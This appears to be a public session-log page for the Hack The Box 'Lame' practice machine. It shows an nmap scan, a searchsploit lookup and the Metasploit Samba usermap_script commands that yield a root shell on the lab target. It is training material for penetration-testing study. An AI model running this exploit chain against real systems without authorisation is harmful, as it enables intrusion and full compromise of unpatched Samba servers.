HTB - Lame Machine

OSCPPUBLIC

Linux machine with SMB vulnerabilities

45 minutes127 commands8 commentsAnonymous Operator

Terminal Output

$ nmap -sV -sC 10.10.10.3
Starting Nmap scan...
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1
139/tcp open netbios-ssn Samba smbd 3.X
445/tcp open netbios-ssn Samba smbd 3.0.20
$ searchsploit samba 3.0.20
Samba 3.0.20 usermap_script exploit found
$ msfconsole
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 10.10.10.3
msf6 > exploit
shell session opened
$ whoami
root

Operation Stats

Duration45m
Commands127
Avg. Commands/min3
StatusPUBLIC

Timeline

Reconnaissance
Nmap scan completed
Exploitation
Samba usermap exploit
Success
Root access gained